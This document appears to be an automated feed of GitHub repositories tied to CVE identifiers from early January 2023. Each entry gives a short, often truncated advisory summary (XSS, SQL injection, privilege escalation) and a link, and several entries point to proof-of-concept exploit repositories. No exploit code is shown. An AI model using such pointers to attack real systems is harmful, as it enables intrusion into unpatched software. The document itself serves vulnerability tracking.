**A vulnerability was found in slackero phpwcms up to 1.9.26. It has been classified as problematic. This affects an unknown part of the component SVG File Handler. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. Upgrading to version 1.9.27 is able to address this issue. Th CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4302](https://github.com/Live-Hack-CVE/CVE-2021-4302) create time: 2023-01-04T23:22:08Z

**A vulnerability has been found in ghostlander Halcyon and classified as critical. Affected by this vulnerability is the function CBlock::AddToBlockIndex of the file src/main.cpp of the component Block Verification. The manipulation leads to improper access controls. The attack can be launched remotely. Upgrading to ver CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4300](https://github.com/Live-Hack-CVE/CVE-2021-4300) create time: 2023-01-04T23:21:46Z

**A vulnerability was found in Kaltura mwEmbed up to 2.96.rc1 and classified as problematic. This issue affects some unknown processing of the file includes/DefaultSettings.php. The manipulation of the argument HTTP_X_FORWARDED_HOST leads to cross site scripting. The attack may be initiated remotely. Upgrading to version CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4876](https://github.com/Live-Hack-CVE/CVE-2022-4876) create time: 2023-01-05T01:33:13Z

**A vulnerability has been found in fossology and classified as problematic. This vulnerability affects unknown code. The manipulation of the argument sql/VarValue leads to cross site scripting. The attack can be initiated remotely. The name of the patch is 8e0eba001662c7eb35f045b70dd458a4643b4553. It is recommended to a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4875](https://github.com/Live-Hack-CVE/CVE-2022-4875) create time: 2023-01-04T23:21:51Z

**Luxon is a library for working with dates and times in JavaScript. On the 1.x branch prior to 1.38.1, the 2.x branch prior to 2.5.2, and the 3.x branch on 3.2.1, Luxon's `DateTime.fromRFC2822() has quadratic (N^2) complexity on some specific inputs. This causes a noticeable slowdown for inputs with lengths above 10k ch CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22467](https://github.com/Live-Hack-CVE/CVE-2023-22467) create time: 2023-01-04T23:22:03Z

**Tokio is a runtime for writing applications with Rust. Starting with version 1.7.0 and prior to versions 1.18.4, 1.20.3, and 1.23.1, when configuring a Windows named pipe server, setting `pipe_mode` will reset `reject_remote_clients` to `false`. If the application has previously configured `reject_remote_clients` to `t CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22466](https://github.com/Live-Hack-CVE/CVE-2023-22466) create time: 2023-01-04T23:21:59Z

**Sensitive Cookie in HTTPS Session Without 'Secure' Attribute in GitHub repository pyload/pyload prior to 0.5.0b3.dev32. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0055](https://github.com/Live-Hack-CVE/CVE-2023-0055) create time: 2023-01-04T23:21:55Z

**** DISPUTED ** The tf_remapper_node component 1.1.1 for Robot Operating System (ROS) allows attackers, who control the source code of a different node in the same ROS application, to change a robot's behavior. This occurs because a topic name depends on the attacker-controlled old_tf_topic_name and/or new_tf_topic_name CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48217](https://github.com/Live-Hack-CVE/CVE-2022-48217) create time: 2023-01-04T21:11:39Z

**A Local File Inclusion vulnerability has been found in Axiell Iguana CMS. Due to insufficient neutralisation of user input on the url parameter on the imageProxy.type.php endpoint, external users are capable of accessing files on the server. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45052](https://github.com/Live-Hack-CVE/CVE-2022-45052) create time: 2023-01-04T21:11:34Z

**A reflected XSS vulnerability has been found in Axiell Iguana CMS, allowing an attacker to execute code in a victim's browser. The module parameter on the Service.template.cls endpoint does not properly neutralise user input, resulting in the vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45051](https://github.com/Live-Hack-CVE/CVE-2022-45051) create time: 2023-01-04T21:11:29Z

**A reflected XSS vulnerability has been found in Axiell Iguana CMS, allowing an attacker to execute code in a victim's browser. The url parameter on the novelist.php endpoint does not properly neutralise user input, resulting in the vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45049](https://github.com/Live-Hack-CVE/CVE-2022-45049) create time: 2023-01-04T21:11:24Z

**Out-of-bounds Write in GitHub repository vim/vim prior to 9.0.1145. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0054](https://github.com/Live-Hack-CVE/CVE-2023-0054) create time: 2023-01-04T21:11:43Z

**IBM Sterling B2B Integrator Standard Edition 6.0.0.0 through 6.1.2.1 uses Cross-Origin Resource Sharing (CORS) which could allow an attacker to carry out privileged actions and retrieve sensitive information as the domain name is not being limited to only trusted domains. IBM X-Force ID: 210323. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-38928](https://github.com/Live-Hack-CVE/CVE-2021-38928) create time: 2023-01-04T20:08:15Z

**NASM v2.16 was discovered to contain a global buffer overflow in the component dbgdbg_typevalue at /output/outdbg.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46456](https://github.com/Live-Hack-CVE/CVE-2022-46456) create time: 2023-01-04T20:08:44Z

**IBM Sterling B2B Integrator Standard Edition 6.0.0.0 through 6.1.2.1 could allow an authenticated user to gain privileges in a different group due to an access control vulnerability in the Sftp server adapter. IBM X-Force ID: 241362. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43920](https://github.com/Live-Hack-CVE/CVE-2022-43920) create time: 2023-01-04T20:08:40Z

**Versions of the package window-control before 1.4.5 are vulnerable to Command Injection via the sendKeys function, due to improper input sanitization. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-25926](https://github.com/Live-Hack-CVE/CVE-2022-25926) create time: 2023-01-04T20:08:34Z

**IBM Sterling B2B Integrator Standard Edition 6.0.0.0 through 6.1.2.1 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 22 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-22352](https://github.com/Live-Hack-CVE/CVE-2022-22352) create time: 2023-01-04T20:08:30Z

**IBM Sterling B2B Integrator Standard Edition 6.0.0.0 through 6.1.2.1 is vulnerable to SQL injection. A remote attacker could send specially crafted SQL statements, which could allow the attacker to view, add, modify or delete information in the back-end database. IBM X-Force ID: 219510. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-22338](https://github.com/Live-Hack-CVE/CVE-2022-22338) create time: 2023-01-04T20:08:25Z

**IBM Sterling B2B Integrator Standard Edition 6.0.0.0 through 6.1.2.1 could disclose sensitive information to an authenticated user. IBM X-Force ID: 219507. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-22337](https://github.com/Live-Hack-CVE/CVE-2022-22337) create time: 2023-01-04T20:08:21Z

**Webmin < 1.290 / Usermin < 1.220 - Arbitrary file disclosure** : [g1vi/CVE-2006-3392](https://github.com/g1vi/CVE-2006-3392) create time: 2023-01-04T18:33:28Z

**Uniswap Universal Router before 1.1.0 mishandles reentrancy. This would have allowed theft of funds. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48216](https://github.com/Live-Hack-CVE/CVE-2022-48216) create time: 2023-01-04T17:56:54Z

**no description** : [sudoninja-noob/CVE-2022-47102](https://github.com/sudoninja-noob/CVE-2022-47102) create time: 2023-01-04T17:56:09Z

**no description** : [sudoninja-noob/CVE-2022-46623](https://github.com/sudoninja-noob/CVE-2022-46623) create time: 2023-01-04T17:54:29Z

**no description** : [sudoninja-noob/CVE-2022-46622](https://github.com/sudoninja-noob/CVE-2022-46622) create time: 2023-01-04T17:52:13Z

**no description** : [sudoninja-noob/CVE-2022-45729](https://github.com/sudoninja-noob/CVE-2022-45729) create time: 2023-01-04T17:50:00Z

**no description** : [sudoninja-noob/CVE-2022-45728](https://github.com/sudoninja-noob/CVE-2022-45728) create time: 2023-01-04T17:41:57Z

**KubePi is a k8s panel. The jwt authentication function of KubePi through version 1.6.2 uses hard-coded Jwtsigkeys, resulting in the same Jwtsigkeys for all online projects. This means that an attacker can forge any jwt token to take over the administrator account of any online project. Furthermore, they may use the adm CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22463](https://github.com/Live-Hack-CVE/CVE-2023-22463) create time: 2023-01-04T17:57:03Z

**Out-of-bounds Read in GitHub repository vim/vim prior to 9.0.1143. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0049](https://github.com/Live-Hack-CVE/CVE-2023-0049) create time: 2023-01-04T17:56:59Z

**** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was in a CNA pool that was not assigned to any issues during 2021. Notes: none. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-41986](https://github.com/Live-Hack-CVE/CVE-2021-41986) create time: 2023-01-04T15:42:57Z

**** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was in a CNA pool that was not assigned to any issues during 2021. Notes: none. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-41985](https://github.com/Live-Hack-CVE/CVE-2021-41985) create time: 2023-01-04T15:42:53Z

**** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was in a CNA pool that was not assigned to any issues during 2021. Notes: none. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-41984](https://github.com/Live-Hack-CVE/CVE-2021-41984) create time: 2023-01-04T15:42:48Z

**** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was in a CNA pool that was not assigned to any issues during 2021. Notes: none. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-41983](https://github.com/Live-Hack-CVE/CVE-2021-41983) create time: 2023-01-04T15:42:44Z

**** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was in a CNA pool that was not assigned to any issues during 2021. Notes: none. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-41982](https://github.com/Live-Hack-CVE/CVE-2021-41982) create time: 2023-01-04T15:42:39Z

**** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was in a CNA pool that was not assigned to any issues during 2021. Notes: none. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-41981](https://github.com/Live-Hack-CVE/CVE-2021-41981) create time: 2023-01-04T15:42:34Z

**** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was in a CNA pool that was not assigned to any issues during 2021. Notes: none. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-41980](https://github.com/Live-Hack-CVE/CVE-2021-41980) create time: 2023-01-04T15:42:29Z

**** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was in a CNA pool that was not assigned to any issues during 2021. Notes: none. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-41979](https://github.com/Live-Hack-CVE/CVE-2021-41979) create time: 2023-01-04T15:42:25Z

**** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was in a CNA pool that was not assigned to any issues during 2021. Notes: none. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-41978](https://github.com/Live-Hack-CVE/CVE-2021-41978) create time: 2023-01-04T15:42:21Z

**** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was in a CNA pool that was not assigned to any issues during 2021. Notes: none. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-41977](https://github.com/Live-Hack-CVE/CVE-2021-41977) create time: 2023-01-04T15:42:16Z

**CVE-2021-4034 PoC** : [pyhrr0/pwnkit](https://github.com/pyhrr0/pwnkit) create time: 2023-01-04T15:15:31Z

**** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was in a CNA pool that was not assigned to any issues during 2022. Notes: none. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-29899](https://github.com/Live-Hack-CVE/CVE-2022-29899) create time: 2023-01-04T15:43:07Z

**** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was in a CNA pool that was not assigned to any issues during 2022. Notes: none. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-0259](https://github.com/Live-Hack-CVE/CVE-2022-0259) create time: 2023-01-04T15:43:02Z

**Code Injection in GitHub repository lirantal/daloradius prior to master-branch. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0048](https://github.com/Live-Hack-CVE/CVE-2023-0048) create time: 2023-01-04T15:43:12Z

**Improper Restriction of Names for Files and Other Resources in GitHub repository lirantal/daloradius prior to master-branch. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0046](https://github.com/Live-Hack-CVE/CVE-2023-0046) create time: 2023-01-04T13:23:50Z

**A vulnerability classified as critical was found in gesellix titlelink. Affected by this vulnerability is an unknown functionality of the file plugin_content_title.php. The manipulation of the argument phrase leads to sql injection. The name of the patch is b4604e523853965fa981a4e79aef4b554a535db0. It is recommended to CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2010-10003](https://github.com/Live-Hack-CVE/CVE-2010-10003) create time: 2023-01-04T12:17:17Z

**A vulnerability, which was classified as problematic, has been found in kkokko NeoXplora. Affected by this issue is some unknown functionality of the component Trainer Handler. The manipulation leads to cross site scripting. The attack may be launched remotely. The name of the patch is dce1aecd6ee050a29f953ffd8f02f21c7 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-125039](https://github.com/Live-Hack-CVE/CVE-2014-125039) create time: 2023-01-04T12:17:22Z

**A vulnerability was found in oxguy3 coebot-www and classified as problematic. This issue affects the function displayChannelCommands/displayChannelQuotes/displayChannelAutoreplies/showChannelHighlights/showChannelBoir of the file js/channel.js. The manipulation leads to cross site scripting. The attack may be initiated CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-15008](https://github.com/Live-Hack-CVE/CVE-2016-15008) create time: 2023-01-04T12:17:27Z

**A vulnerability, which was classified as problematic, was found in innologi appointments Extension up to 2.0.5. This affects an unknown part of the component Appointment Handler. The manipulation of the argument formfield leads to cross site scripting. It is possible to initiate the attack remotely. Upgrading to versio CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-25094](https://github.com/Live-Hack-CVE/CVE-2019-25094) create time: 2023-01-04T12:17:32Z

**A vulnerability has been found in AlliedModders AMX Mod X and classified as critical. This vulnerability affects the function cmdVoteMap of the file plugins/adminvote.sma of the component Console Command Handler. The manipulation of the argument amx_votemap leads to path traversal. The name of the patch is a5f2b5539f6d CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36639](https://github.com/Live-Hack-CVE/CVE-2020-36639) create time: 2023-01-04T12:17:36Z

**In wlan driver, there is a possible missing bounds check. This could lead to local denial of service in wlan services. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44426](https://github.com/Live-Hack-CVE/CVE-2022-44426) create time: 2023-01-04T12:19:08Z

**In wlan driver, there is a possible missing bounds check. This could lead to local denial of service in wlan services. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44425](https://github.com/Live-Hack-CVE/CVE-2022-44425) create time: 2023-01-04T12:19:03Z

**In music service, there is a missing permission check. This could lead to local denial of service in contacts service with no additional execution privileges needed. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44424](https://github.com/Live-Hack-CVE/CVE-2022-44424) create time: 2023-01-04T12:18:58Z

**In music service, there is a missing permission check. This could lead to local denial of service in contacts service with no additional execution privileges needed. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44423](https://github.com/Live-Hack-CVE/CVE-2022-44423) create time: 2023-01-04T12:18:53Z

**In music service, there is a missing permission check. This could lead to local denial of service in contacts service with no additional execution privileges needed. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44422](https://github.com/Live-Hack-CVE/CVE-2022-44422) create time: 2023-01-04T12:18:49Z

**In sprd_sysdump driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39118](https://github.com/Live-Hack-CVE/CVE-2022-39118) create time: 2023-01-04T12:18:44Z

**In sprd_sysdump driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39116](https://github.com/Live-Hack-CVE/CVE-2022-39116) create time: 2023-01-04T12:18:40Z

**In contacts service, there is a missing permission check. This could lead to local denial of service in Contacts service with no additional execution privileges needed. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39104](https://github.com/Live-Hack-CVE/CVE-2022-39104) create time: 2023-01-04T12:18:35Z

**In network service, there is a missing permission check. This could lead to local escalation of privilege with System execution privileges needed. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39088](https://github.com/Live-Hack-CVE/CVE-2022-39088) create time: 2023-01-04T12:18:31Z

**In network service, there is a missing permission check. This could lead to local escalation of privilege with System execution privileges needed. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39087](https://github.com/Live-Hack-CVE/CVE-2022-39087) create time: 2023-01-04T12:18:26Z

**In network service, there is a missing permission check. This could lead to local escalation of privilege with System execution privileges needed. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39086](https://github.com/Live-Hack-CVE/CVE-2022-39086) create time: 2023-01-04T12:18:21Z

**In network service, there is a missing permission check. This could lead to local escalation of privilege with System execution privileges needed. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39085](https://github.com/Live-Hack-CVE/CVE-2022-39085) create time: 2023-01-04T12:18:17Z

**In network service, there is a missing permission check. This could lead to local escalation of privilege with System execution privileges needed. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39084](https://github.com/Live-Hack-CVE/CVE-2022-39084) create time: 2023-01-04T12:18:12Z

**In network service, there is a missing permission check. This could lead to local escalation of privilege with System execution privileges needed. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39083](https://github.com/Live-Hack-CVE/CVE-2022-39083) create time: 2023-01-04T12:18:08Z

**In network service, there is a missing permission check. This could lead to local escalation of privilege with System execution privileges needed. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39082](https://github.com/Live-Hack-CVE/CVE-2022-39082) create time: 2023-01-04T12:18:04Z

**In network service, there is a missing permission check. This could lead to local escalation of privilege with System execution privileges needed. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39081](https://github.com/Live-Hack-CVE/CVE-2022-39081) create time: 2023-01-04T12:17:59Z

**In contacts service, there is a missing permission check. This could lead to local denial of service in contacts service with no additional execution privileges needed. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38684](https://github.com/Live-Hack-CVE/CVE-2022-38684) create time: 2023-01-04T12:17:54Z

**In contacts service, there is a missing permission check. This could lead to local denial of service in contacts service with no additional execution privileges needed. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38683](https://github.com/Live-Hack-CVE/CVE-2022-38683) create time: 2023-01-04T12:17:50Z

**In contacts service, there is a missing permission check. This could lead to local denial of service in contacts service with no additional execution privileges needed. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38682](https://github.com/Live-Hack-CVE/CVE-2022-38682) create time: 2023-01-04T12:17:45Z

**In contacts service, there is a missing permission check. This could lead to local denial of service in contacts service with no additional execution privileges needed. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38678](https://github.com/Live-Hack-CVE/CVE-2022-38678) create time: 2023-01-04T12:17:40Z

**no description** : [ajith737/Dirty-Pipe-CVE-2022-0847-POCs](https://github.com/ajith737/Dirty-Pipe-CVE-2022-0847-POCs) create time: 2023-01-04T12:17:12Z

**In Garmin Connect 4.61, terminating a LiveTrack session wouldn't prevent the LiveTrack API from continued exposure of private personal information. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46081](https://github.com/Live-Hack-CVE/CVE-2022-46081) create time: 2023-01-04T06:48:40Z

**CVE-2022-46689** : [straight-tamago/DockTransparent](https://github.com/straight-tamago/DockTransparent) create time: 2023-01-04T05:08:20Z

**Basic POC exploit for CVE-2022-46164** : [stephenbradshaw/CVE-2022-46164-poc](https://github.com/stephenbradshaw/CVE-2022-46164-poc) create time: 2023-01-04T04:17:30Z

**no description** : [houseofxyz/CVE-2018-19320](https://github.com/houseofxyz/CVE-2018-19320) create time: 2023-01-01T13:50:39Z

**Nice (formerly Nortek) Linear eMerge E3-Series 0.32-08f, 0.32-07p, 0.32-07e, 0.32-09c, 0.32-09b, 0.32-09a, and 0.32-08e devices are vulnerable to Stored Cross-Site Scripting (XSS). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42710](https://github.com/Live-Hack-CVE/CVE-2022-42710) create time: 2023-01-04T02:17:02Z

**** DISPUTED ** In b2evolution 7.2.5, if configured with admins_can_manipulate_sensitive_files, arbitrary file upload is allowed for admins, leading to command execution. NOTE: the vendor's position is that this is "very obviously a feature not an issue and if you don't like that feature it is very obvious how to disabl CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44036](https://github.com/Live-Hack-CVE/CVE-2022-44036) create time: 2023-01-04T02:16:58Z

**IBM Business Automation Workflow 18.0.0, 18.0.1, 18.0.2, 19.0.1, 19.0.2, 19.0.3, 20.0.1, 20.0.2, 20.0.3, 21.0.1, 21.0.2, 21.0.3, and 22.0.1 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42435](https://github.com/Live-Hack-CVE/CVE-2022-42435) create time: 2023-01-04T02:16:53Z

**CVE-2022-28672 Vulnerabilidad Foxit PDF Reader - UaF - RCE - JIT Spraying** : [fastmo/CVE-2022-28672](https://github.com/fastmo/CVE-2022-28672) create time: 2023-01-04T01:39:04Z

**CVE-2022-46689** : [straight-tamago/NoHomeBar](https://github.com/straight-tamago/NoHomeBar) create time: 2023-01-03T21:46:37Z

**In mtk-aie, there is a possible use after free due to a logic error. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07262518; Issue ID: ALPS07262518. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32653](https://github.com/Live-Hack-CVE/CVE-2022-32653) create time: 2023-01-04T00:08:38Z

**In mtk-aie, there is a possible use after free due to a logic error. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07262617; Issue ID: ALPS07262617. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32652](https://github.com/Live-Hack-CVE/CVE-2022-32652) create time: 2023-01-04T00:08:34Z

**In mtk-aie, there is a possible use after free due to a logic error. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07225857; Issue ID: ALPS07225857. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32651](https://github.com/Live-Hack-CVE/CVE-2022-32651) create time: 2023-01-04T00:08:30Z

**In mtk-isp, there is a possible use after free due to a logic error. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07225853; Issue ID: ALPS07225853. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32650](https://github.com/Live-Hack-CVE/CVE-2022-32650) create time: 2023-01-04T00:08:26Z

**In jpeg, there is a possible use after free due to a logic error. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07225840; Issue ID: ALPS07225840. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32649](https://github.com/Live-Hack-CVE/CVE-2022-32649) create time: 2023-01-04T00:08:21Z

**In disp, there is a possible use after free due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS06535964; Issue ID: ALPS06535964. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32648](https://github.com/Live-Hack-CVE/CVE-2022-32648) create time: 2023-01-04T00:08:17Z

**In ccu, there is a possible out of bounds write due to improper input validation. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07554646; Issue ID: ALPS07554646. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32647](https://github.com/Live-Hack-CVE/CVE-2022-32647) create time: 2023-01-04T00:08:13Z

**In gpu drm, there is a possible stack overflow due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07363501; Issue ID: ALPS07363501. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32646](https://github.com/Live-Hack-CVE/CVE-2022-32646) create time: 2023-01-04T00:08:09Z

**In vow, there is a possible information disclosure due to a race condition. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07494477; Issue ID: ALPS07494477. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32645](https://github.com/Live-Hack-CVE/CVE-2022-32645) create time: 2023-01-04T00:08:05Z

**In vow, there is a possible use after free due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07494473; Issue ID: ALPS07494473. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32644](https://github.com/Live-Hack-CVE/CVE-2022-32644) create time: 2023-01-04T00:08:00Z

**In meta wifi, there is a possible out of bounds read due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07453594; Issue ID: ALPS07453594. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32641](https://github.com/Live-Hack-CVE/CVE-2022-32641) create time: 2023-01-04T00:07:56Z

**In meta wifi, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07441652; Issue ID: ALPS07441652. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32640](https://github.com/Live-Hack-CVE/CVE-2022-32640) create time: 2023-01-04T00:07:51Z

**In watchdog, there is a possible out of bounds read due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07494487; Issue ID: ALPS07494487. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32639](https://github.com/Live-Hack-CVE/CVE-2022-32639) create time: 2023-01-04T00:07:47Z

**In isp, there is a possible out of bounds write due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07494449; Issue ID: ALPS07494449. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32638](https://github.com/Live-Hack-CVE/CVE-2022-32638) create time: 2023-01-04T00:07:42Z

**In hevc decoder, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07491374; Issue ID: ALPS07491374. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32637](https://github.com/Live-Hack-CVE/CVE-2022-32637) create time: 2023-01-04T00:07:37Z

**In keyinstall, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07510064; Issue ID: ALPS07510064. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32636](https://github.com/Live-Hack-CVE/CVE-2022-32636) create time: 2023-01-04T00:07:33Z

**In gps, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07573237; Issue ID: ALPS07573237. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32635](https://github.com/Live-Hack-CVE/CVE-2022-32635) create time: 2023-01-04T00:07:29Z

**In mdp, there is a possible out of bounds write due to incorrect error handling. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07342114; Issue ID: ALPS07342114. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32623](https://github.com/Live-Hack-CVE/CVE-2022-32623) create time: 2023-01-04T00:07:24Z

**Spinnaker is an open source, multi-cloud continuous delivery platform for releasing software changes, and Spinnaker's Rosco microservice produces machine images. Rosco prior to versions 1.29.2, 1.28.4, and 1.27.3 does not property mask secrets generated via packer builds. This can lead to exposure of sensitive AWS cred CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-23506](https://github.com/Live-Hack-CVE/CVE-2022-23506) create time: 2023-01-04T00:07:19Z

**Gravitee API Management before 3.15.13 allows path traversal through HTML injection. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38723](https://github.com/Live-Hack-CVE/CVE-2022-38723) create time: 2023-01-04T00:07:11Z

**Prosys OPC UA Simulation Server version prior to v5.3.0-64 and UA Modbus Server versions 1.4.18-5 and prior do not sufficiently protect credentials, which could allow an attacker to obtain user credentials and gain access to system data. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2967](https://github.com/Live-Hack-CVE/CVE-2022-2967) create time: 2023-01-04T00:07:05Z

